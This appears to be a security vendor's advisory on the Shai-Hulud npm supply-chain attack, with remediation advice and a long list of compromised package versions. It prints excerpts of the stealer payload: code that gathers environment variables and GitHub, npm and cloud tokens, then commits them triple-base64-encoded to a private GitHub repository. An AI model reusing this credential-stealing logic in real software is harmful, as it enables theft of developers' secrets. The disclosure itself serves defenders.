Shai-Hulud npm supply chain attack – new compromised packages detected
By
6 min read
Recently, the npm ecosystem has faced its third large-scale attack. Following the recent compromise of the nx packages and another wave targeting popular packages, the registry has once again been attacked.
The first report came from Daniel Pereira, who identified a compromised package: @ctrl/tinycolor@4.1.1. By the end of the day, JFrog’s malware scanners had identified 164 unique malicious packages across 338 infected versions, containing multiple variations of the same data-stealer payload.
Shai-Hulud Data Stealer Payload
The malicious payload is bundled into a bundle.js file, packaged as a Webpack application. While it promises to optimize the user’s system, its actual functionality is much more dangerous.
{
name: "System Info App",
version: "1.0.0",
description: "Optimizes system."
}
Instead of system optimization, it initially gathers complete information about the system, including credentials from GitHub, NPM, AWS, and GCP. In addition to the supported platforms, it downloads and runs TruffleHog: an open-source utility that searches and gathers the aforementioned types of secrets.
const system_info = {
application: t.getConfig(),
system: {
platform: r.platform,
architecture: r.architecture,
platformDetailed: r.platformRaw,
architectureDetailed: r.archRaw
},
runtime: runtime_info,
environment: process.env,
modules: {
github: {
authenticated: GitHubModule.isAuthenticated(),
token: GitHubModule.getCurrentToken()
},
aws: {
secrets: ue
},
gcp: {
secrets: de
},
truffleHog: truffle_hog_dump,
npm: {
token: npm_token,
authenticated: npm_authenticated,
username: npm_user
}
}
};
After the data is gathered, it attempts to authenticate under the existing user’s account, and in the event of success, creates a repository named Shai-Hulud with the stolen content, encoded multiple times using base64.
async makeRepo(t, r) {
const n = (await this.octokit.rest.repos.createForAuthenticatedUser({
name: t,
description: "Shai-Hulud Repository.",
private: !0,
})).data;
return await new Promise(t => setTimeout(t, 3e3)), r && await this.octokit.rest.repos.createOrUpdateFileContents({
path: "data.json",
message: "Initial commit",
content: Buffer.from(Buffer.from(Buffer.from(r).toString("base64")).toString("base64")).toString("base64")
})
}
if GitHubModule.isAuthenticated() & ! GitHubModule.repoExists("Shai-Hulud") {
await GitHubModule.makeRepo("Shai-Hulud", formatOutput(pe)
exitWithCode(0)
}
We observed eight variants of the above payload. While the main functionality is the same, some versions contain slight differences, suggesting iterative adjustments by the attacker over the course of the campaign.
For example, some versions make the “Shai-Hulud” repository private, hiding it from discovery. Another version also tries to steal Azure credentials in addition to the four mentioned credential types.
What should impacted users do?
If you installed any of the packages mentioned under “Compromised Packages”, the malicious payload may have exfiltrated sensitive information from your system.
Perform the following operations –
- Rotate any access tokens that were stored on the affected machine of the following providers – GitHub, NPM, AWS, GCP, Azure
- Rotate any access tokens that were stored on the affected machine which can be identified by TruffleHog. Supported providers can be searched for in Trufflehog’s GitHub repository.
Who is behind this attack?
The use of GitHub repositories to store stolen data mirrors techniques seen in the previous NX CLI compromise. However, it’s not enough to say whether these incidents are the work of the same actor. The tooling and payload design are similar, but attribution remains uncertain.
Compromised Packages
Original report
The original report contained these compromised package versions –
angulartics2@14.1.2
@ctrl/deluge@7.2.2
@ctrl/golang-template@1.4.3
@ctrl/magnet-link@4.0.4
@ctrl/ngx-codemirror@7.0.2
@ctrl/ngx-csv@6.0.2
@ctrl/ngx-emoji-mart@9.2.2
@ctrl/ngx-rightclick@4.0.2
@ctrl/qbittorrent@9.7.2
@ctrl/react-adsense@2.0.2
@ctrl/shared-torrent@6.3.2
@ctrl/tinycolor@4.1.1, @4.1.2
@ctrl/torrent-file@4.1.2
@ctrl/transmission@7.3.1
@ctrl/ts-base32@4.0.2
encounter-playground@0.0.5
json-rules-engine-simplified@0.2.4, 0.2.1
koa2-swagger-ui@5.11.2, 5.11.1
@nativescript-community/gesturehandler@2.0.35
@nativescript-community/sentry 4.6.43
@nativescript-community/text@1.6.13
@nativescript-community/ui-collectionview@6.0.6
@nativescript-community/ui-drawer@0.1.30
@nativescript-community/ui-image@4.5.6
@nativescript-community/ui-material-bottomsheet@7.2.72
@nativescript-community/ui-material-core@7.2.76
@nativescript-community/ui-material-core-tabs@7.2.76
ngx-color@10.0.2
ngx-toastr@19.0.2
ngx-trend@8.0.1
react-complaint-image@0.0.35
react-jsonschema-form-conditionals@0.3.21
react-jsonschema-form-extras@1.0.4
rxnt-authentication@0.0.6
rxnt-healthchecks-nestjs@1.0.5
rxnt-kue@1.0.7
swc-plugin-component-annotate@1.9.2
ts-gaussian@3.0.6
Newly detected compromised packages (ongoing)
We’re continuing to track the unfolding compromise of more packages in this campaign. Our monitoring infrastructure has detected additional malicious packages with the same payload (or variations of it) with hundreds of versions –
@ahmedhfarag/ngx-perfect-scrollbar@20.0.20
@ahmedhfarag/ngx-virtual-scroller@4.0.4
@art-ws/common@2.0.28
@art-ws/config-eslint@2.0.4
@art-ws/config-eslint@2.0.5
@art-ws/config-ts@2.0.7
@art-ws/config-ts@2.0.8
@art-ws/db-context@2.0.24
@art-ws/di-node@2.0.13
@art-ws/di@2.0.28
@art-ws/di@2.0.32
@art-ws/eslint@1.0.5
@art-ws/eslint@1.0.6
@art-ws/fastify-http-server@2.0.24
@art-ws/fastify-http-server@2.0.27
@art-ws/http-server@2.0.21
@art-ws/http-server@2.0.25
@art-ws/openapi@0.1.12
@art-ws/openapi@0.1.9
@art-ws/package-base@1.0.5
@art-ws/package-base@1.0.6
@art-ws/prettier@1.0.5
@art-ws/prettier@1.0.6
@art-ws/slf@2.0.15
@art-ws/slf@2.0.22
@art-ws/ssl-info@1.0.10
@art-ws/ssl-info@1.0.9
@art-ws/web-app@1.0.3
@art-ws/web-app@1.0.4
@crowdstrike/commitlint@8.1.1
@crowdstrike/commitlint@8.1.2
@crowdstrike/falcon-shoelace@0.4.1
@crowdstrike/falcon-shoelace@0.4.2
@crowdstrike/foundry-js@0.19.1
@crowdstrike/foundry-js@0.19.2
@crowdstrike/glide-core@0.34.2
@crowdstrike/glide-core@0.34.3
@crowdstrike/logscale-dashboard@1.205.1
@crowdstrike/logscale-dashboard@1.205.2
@crowdstrike/logscale-file-editor@1.205.1
@crowdstrike/logscale-file-editor@1.205.2
@crowdstrike/logscale-parser-edit@1.205.1
@crowdstrike/logscale-parser-edit@1.205.2
@crowdstrike/logscale-search@1.205.1
@crowdstrike/logscale-search@1.205.2
@crowdstrike/tailwind-toucan-base@5.0.1
@crowdstrike/tailwind-toucan-base@5.0.2
@ctrl/deluge@7.2.1
@ctrl/deluge@7.2.2
@ctrl/golang-template@1.4.2
@ctrl/golang-template@1.4.3
@ctrl/magnet-link@4.0.3
@ctrl/magnet-link@4.0.4
@ctrl/ngx-codemirror@7.0.1
@ctrl/ngx-codemirror@7.0.2
@ctrl/ngx-csv@6.0.1
@ctrl/ngx-csv@6.0.2
@ctrl/ngx-emoji-mart@9.2.1
@ctrl/ngx-emoji-mart@9.2.2
@ctrl/ngx-rightclick@4.0.1
@ctrl/ngx-rightclick@4.0.2
@ctrl/qbittorrent@9.7.1
@ctrl/qbittorrent@9.7.2
@ctrl/react-adsense@2.0.1
@ctrl/react-adsense@2.0.2
@ctrl/shared-torrent@6.3.1
@ctrl/shared-torrent@6.3.2
@ctrl/tinycolor@4.1.1
@ctrl/tinycolor@4.1.2
@ctrl/torrent-file@4.1.1
@ctrl/torrent-file@4.1.2
@ctrl/transmission@7.3.1
@ctrl/ts-base32@4.0.1
@ctrl/ts-base32@4.0.2
@hestjs/core@0.2.1
@hestjs/cqrs@0.1.6
@hestjs/demo@0.1.2
@hestjs/eslint-config@0.1.2
@hestjs/logger@0.1.6
@hestjs/scalar@0.1.7
@hestjs/validation@0.1.6
@nativescript-community/arraybuffers@1.1.6
@nativescript-community/arraybuffers@1.1.7
@nativescript-community/arraybuffers@1.1.8
@nativescript-community/gesturehandler@2.0.35
@nativescript-community/perms@3.0.5
@nativescript-community/perms@3.0.6
@nativescript-community/perms@3.0.7
@nativescript-community/perms@3.0.8
@nativescript-community/sentry@4.6.43
@nativescript-community/sqlite@3.5.2
@nativescript-community/sqlite@3.5.3
@nativescript-community/sqlite@3.5.4
@nativescript-community/sqlite@3.5.5
@nativescript-community/text@1.6.10
@nativescript-community/text@1.6.11
@nativescript-community/text@1.6.12
@nativescript-community/text@1.6.13
@nativescript-community/text@1.6.9
@nativescript-community/typeorm@0.2.30
@nativescript-community/typeorm@0.2.31
@nativescript-community/typeorm@0.2.32
@nativescript-community/typeorm@0.2.33
@nativescript-community/ui-collectionview@6.0.6
@nativescript-community/ui-document-picker@1.1.27
@nativescript-community/ui-document-picker@1.1.28
@nativescript-community/ui-drawer@0.1.30
@nativescript-community/ui-image@4.5.6
@nativescript-community/ui-label@1.3.35
@nativescript-community/ui-label@1.3.36
@nativescript-community/ui-label@1.3.37
@nativescript-community/ui-material-bottom-navigation@7.2.72
@nativescript-community/ui-material-bottom-navigation@7.2.73
@nativescript-community/ui-material-bottom-navigation@7.2.74
@nativescript-community/ui-material-bottom-navigation@7.2.75
@nativescript-community/ui-material-bottomsheet@7.2.72
@nativescript-community/ui-material-core-tabs@7.2.72
@nativescript-community/ui-material-core-tabs@7.2.73
@nativescript-community/ui-material-core-tabs@7.2.74
@nativescript-community/ui-material-core-tabs@7.2.75
@nativescript-community/ui-material-core-tabs@7.2.76
@nativescript-community/ui-material-core@7.2.72
@nativescript-community/ui-material-core@7.2.73
@nativescript-community/ui-material-core@7.2.74
@nativescript-community/ui-material-core@7.2.75
@nativescript-community/ui-material-core@7.2.76
@nativescript-community/ui-material-ripple@7.2.72
@nativescript-community/ui-material-ripple@7.2.73
@nativescript-community/ui-material-ripple@7.2.74
@nativescript-community/ui-material-ripple@7.2.75
@nativescript-community/ui-material-tabs@7.2.72
@nativescript-community/ui-material-tabs@7.2.73
@nativescript-community/ui-material-tabs@7.2.74
@nativescript-community/ui-material-tabs@7.2.75
@nativescript-community/ui-pager@14.1.36
@nativescript-community/ui-pager@14.1.37
@nativescript-community/ui-pager@14.1.38
@nativescript-community/ui-pulltorefresh@2.5.4
@nativescript-community/ui-pulltorefresh@2.5.5
@nativescript-community/ui-pulltorefresh@2.5.6
@nativescript-community/ui-pulltorefresh@2.5.7
@nexe/config-manager@0.1.1
@nexe/eslint-config@0.1.1
@nexe/logger@0.1.3
@nstudio/angular@20.0.4
@nstudio/angular@20.0.5
@nstudio/angular@20.0.6
@nstudio/focus@20.0.4
@nstudio/focus@20.0.5
@nstudio/focus@20.0.6
@nstudio/nativescript-checkbox@2.0.6
@nstudio/nativescript-checkbox@2.0.7
@nstudio/nativescript-checkbox@2.0.8
@nstudio/nativescript-checkbox@2.0.9
@nstudio/nativescript-loading-indicator@5.0.1
@nstudio/nativescript-loading-indicator@5.0.2
@nstudio/nativescript-loading-indicator@5.0.3
@nstudio/nativescript-loading-indicator@5.0.4
@nstudio/ui-collectionview@5.1.11
@nstudio/ui-collectionview@5.1.12
@nstudio/ui-collectionview@5.1.13
@nstudio/ui-collectionview@5.1.14
@nstudio/web-angular@20.0.4
@nstudio/web@20.0.4
@nstudio/xplat-utils@20.0.5
@nstudio/xplat-utils@20.0.6
@nstudio/xplat-utils@20.0.7
@nstudio/xplat@20.0.5
@nstudio/xplat@20.0.6
@nstudio/xplat@20.0.7
@operato/board@9.0.36
@operato/board@9.0.37
@operato/board@9.0.38
@operato/board@9.0.39
@operato/board@9.0.40
@operato/board@9.0.41
@operato/board@9.0.42
@operato/board@9.0.43
@operato/board@9.0.44
@operato/board@9.0.45
@operato/board@9.0.46
@operato/data-grist@9.0.29
@operato/data-grist@9.0.35
@operato/data-grist@9.0.36
@operato/data-grist@9.0.37
@operato/graphql@9.0.22
@operato/graphql@9.0.35
@operato/graphql@9.0.36
@operato/graphql@9.0.37
@operato/graphql@9.0.38
@operato/graphql@9.0.39
@operato/graphql@9.0.40
@operato/graphql@9.0.41
@operato/graphql@9.0.42
@operato/graphql@9.0.43
@operato/graphql@9.0.44
@operato/graphql@9.0.45
@operato/graphql@9.0.46
@operato/headroom@9.0.2
@operato/headroom@9.0.35
@operato/headroom@9.0.36
@operato/headroom@9.0.37
@operato/help@9.0.35
@operato/help@9.0.36
@operato/help@9.0.37
@operato/help@9.0.38
@operato/help@9.0.39
@operato/help@9.0.40
@operato/help@9.0.41
@operato/help@9.0.42
@operato/help@9.0.43
@operato/help@9.0.44
@operato/help@9.0.45
@operato/help@9.0.46
@operato/i18n@9.0.35
@operato/i18n@9.0.36
@operato/i18n@9.0.37
@operato/input@9.0.27
@operato/input@9.0.35
@operato/input@9.0.36
@operato/input@9.0.37
@operato/input@9.0.38
@operato/input@9.0.39
@operato/input@9.0.40
@operato/input@9.0.41
@operato/input@9.0.42
@operato/input@9.0.43
@operato/input@9.0.44
@operato/input@9.0.45
@operato/input@9.0.46
@operato/input@9.0.47
@operato/input@9.0.48
@operato/layout@9.0.35
@operato/layout@9.0.36
@operato/layout@9.0.37
@operato/popup@9.0.22
@operato/popup@9.0.35
@operato/popup@9.0.36
@operato/popup@9.0.37
@operato/popup@9.0.38
@operato/popup@9.0.39
@operato/popup@9.0.40
@operato/popup@9.0.41
@operato/popup@9.0.42
@operato/popup@9.0.43
@operato/popup@9.0.44
@operato/popup@9.0.45
@operato/popup@9.0.46
@operato/popup@9.0.49
@operato/pull-to-refresh@9.0.36
@operato/pull-to-refresh@9.0.37
@operato/pull-to-refresh@9.0.38
@operato/pull-to-refresh@9.0.39
@operato/pull-to-refresh@9.0.40
@operato/pull-to-refresh@9.0.41
@operato/pull-to-refresh@9.0.42
@operato/shell@9.0.22
@operato/shell@9.0.35
@operato/shell@9.0.36
@operato/shell@9.0.37
@operato/shell@9.0.38
@operato/shell@9.0.39
@operato/styles@9.0.2
@operato/styles@9.0.35
@operato/styles@9.0.36
@operato/styles@9.0.37
@operato/utils@9.0.22
@operato/utils@9.0.35
@operato/utils@9.0.36
@operato/utils@9.0.37
@operato/utils@9.0.38
@operato/utils@9.0.39
@operato/utils@9.0.40
@operato/utils@9.0.41
@operato/utils@9.0.42
@operato/utils@9.0.43
@operato/utils@9.0.44
@operato/utils@9.0.45
@operato/utils@9.0.46
@operato/utils@9.0.49
@teselagen/bio-parsers@0.4.30
@teselagen/bounce-loader@0.3.16
@teselagen/bounce-loader@0.3.17
@teselagen/file-utils@0.3.22
@teselagen/liquibase-tools@0.4.1
@teselagen/ove@0.7.40
@teselagen/range-utils@0.3.14
@teselagen/range-utils@0.3.15
@teselagen/react-list@0.8.19
@teselagen/react-list@0.8.20
@teselagen/react-table@6.10.19
@teselagen/react-table@6.10.20
@teselagen/react-table@6.10.22
@teselagen/sequence-utils@0.3.34
@teselagen/ui@0.9.10
@thangved/callback-window@1.1.4
@things-factory/attachment-base@9.0.43
@things-factory/attachment-base@9.0.44
@things-factory/attachment-base@9.0.45
@things-factory/attachment-base@9.0.46
@things-factory/attachment-base@9.0.47
@things-factory/attachment-base@9.0.48
@things-factory/attachment-base@9.0.49
@things-factory/attachment-base@9.0.50
@things-factory/auth-base@9.0.43
@things-factory/auth-base@9.0.44
@things-factory/auth-base@9.0.45
@things-factory/email-base@9.0.42
@things-factory/email-base@9.0.43
@things-factory/email-base@9.0.44
@things-factory/email-base@9.0.45
@things-factory/email-base@9.0.46
@things-factory/email-base@9.0.47
@things-factory/email-base@9.0.48
@things-factory/email-base@9.0.49
@things-factory/email-base@9.0.50
@things-factory/email-base@9.0.51
@things-factory/email-base@9.0.52
@things-factory/email-base@9.0.53
@things-factory/email-base@9.0.54
@things-factory/env@9.0.42
@things-factory/env@9.0.43
@things-factory/env@9.0.44
@things-factory/env@9.0.45
@things-factory/integration-base@9.0.43
@things-factory/integration-base@9.0.44
@things-factory/integration-base@9.0.45
@things-factory/integration-marketplace@9.0.43
@things-factory/integration-marketplace@9.0.44
@things-factory/integration-marketplace@9.0.45
@things-factory/shell@9.0.43
@things-factory/shell@9.0.44
@things-factory/shell@9.0.45
@tnf-dev/api@1.0.8
@tnf-dev/core@1.0.8
@tnf-dev/js@1.0.8
@tnf-dev/mui@1.0.8
@tnf-dev/react@1.0.8
@ui-ux-gang/devextreme-angular-rpk@24.1.7
@yoobic/design-system@6.5.17
@yoobic/jpeg-camera-es6@1.0.13
@yoobic/yobi@8.7.53
airchief@0.3.1
airpilot@0.8.8
angulartics2@14.1.1
angulartics2@14.1.2
browser-webdriver-downloader@3.0.8
capacitor-notificationhandler@0.0.2
capacitor-notificationhandler@0.0.3
capacitor-plugin-healthapp@0.0.2
capacitor-plugin-healthapp@0.0.3
capacitor-plugin-ihealth@1.1.8
capacitor-plugin-ihealth@1.1.9
capacitor-plugin-vonage@1.0.2
capacitor-plugin-vonage@1.0.3
capacitorandroidpermissions@0.0.4
capacitorandroidpermissions@0.0.5
config-cordova@0.8.5
cordova-plugin-voxeet2@1.0.24
cordova-voxeet@1.0.32
create-hest-app@0.1.9
db-evo@1.1.4
db-evo@1.1.5
devextreme-angular-rpk@21.2.8
ember-browser-services@5.0.2
ember-browser-services@5.0.3
ember-headless-form-yup@1.0.1
ember-headless-form@1.1.2
ember-headless-form@1.1.3
ember-headless-table@2.1.5
ember-headless-table@2.1.6
ember-url-hash-polyfill@1.0.12
ember-url-hash-polyfill@1.0.13
ember-velcro@2.2.1
ember-velcro@2.2.2
encounter-playground@0.0.2
encounter-playground@0.0.3
encounter-playground@0.0.4
encounter-playground@0.0.5
eslint-config-crowdstrike-node@4.0.3
eslint-config-crowdstrike-node@4.0.4
eslint-config-crowdstrike@11.0.2
eslint-config-crowdstrike@11.0.3
eslint-config-teselagen@6.1.7
eslint-config-teselagen@6.1.8
globalize-rpk@1.7.4
graphql-sequelize-teselagen@5.3.8
graphql-sequelize-teselagen@5.3.9
html-to-base64-image@1.0.2
json-rules-engine-simplified@0.2.1
json-rules-engine-simplified@0.2.4
jumpgate@0.0.2
koa2-swagger-ui@5.11.1
koa2-swagger-ui@5.11.2
mcfly-semantic-release@1.3.1
mcp-knowledge-base@0.0.2
mcp-knowledge-graph@1.2.1
mobioffice-cli@1.0.3
monorepo-next@13.0.1
monorepo-next@13.0.2
mstate-angular@0.4.4
mstate-cli@0.4.7
mstate-dev-react@1.1.1
mstate-react@1.6.5
ng2-file-upload@7.0.2
ng2-file-upload@7.0.3
ng2-file-upload@8.0.1
ng2-file-upload@8.0.2
ng2-file-upload@8.0.3
ng2-file-upload@9.0.1
ngx-bootstrap@18.1.4
ngx-bootstrap@19.0.3
ngx-bootstrap@19.0.4
ngx-bootstrap@20.0.3
ngx-bootstrap@20.0.4
ngx-bootstrap@20.0.5
ngx-color@10.0.1
ngx-color@10.0.2
ngx-toastr@19.0.1
ngx-toastr@19.0.2
ngx-trend@8.0.1
ngx-ws@1.1.5
ngx-ws@1.1.6
oradm-to-gql@35.0.14
oradm-to-gql@35.0.15
oradm-to-sqlz@1.1.2
ove-auto-annotate@0.0.10
ove-auto-annotate@0.0.9
pm2-gelf-json@1.0.4
pm2-gelf-json@1.0.5
printjs-rpk@1.6.1
react-complaint-image@0.0.32
react-complaint-image@0.0.35
react-jsonschema-form-conditionals@0.3.18
react-jsonschema-form-conditionals@0.3.21
react-jsonschema-form-extras@1.0.4
react-jsonschema-rxnt-extras@0.4.9
remark-preset-lint-crowdstrike@4.0.1
remark-preset-lint-crowdstrike@4.0.2
rxnt-authentication@0.0.3
rxnt-authentication@0.0.4
rxnt-authentication@0.0.5
rxnt-authentication@0.0.6
rxnt-healthchecks-nestjs@1.0.2
rxnt-healthchecks-nestjs@1.0.3
rxnt-healthchecks-nestjs@1.0.4
rxnt-healthchecks-nestjs@1.0.5
rxnt-kue@1.0.4
rxnt-kue@1.0.5
rxnt-kue@1.0.6
rxnt-kue@1.0.7
swc-plugin-component-annotate@1.9.1
swc-plugin-component-annotate@1.9.2
tbssnch@1.0.2
teselagen-interval-tree@1.1.2
tg-client-query-builder@2.14.4
tg-client-query-builder@2.14.5
tg-redbird@1.3.1
tg-redbird@1.3.2
tg-seq-gen@1.0.10
tg-seq-gen@1.0.9
thangved-react-grid@1.0.3
ts-gaussian@3.0.5
ts-gaussian@3.0.6
ts-imports@1.0.1
ts-imports@1.0.2
tvi-cli@0.1.5
ve-bamreader@0.2.6
ve-bamreader@0.2.7
ve-editor@1.0.1
ve-editor@1.0.2
verror-extra@6.0.1
voip-callkit@1.0.2
voip-callkit@1.0.3
wdio-web-reporter@0.1.3
yargs-help-output@5.0.3
yoo-styles@6.0.326
Train and Learn with the Best in DevOps, DevSecOps, Al, and MLOps!
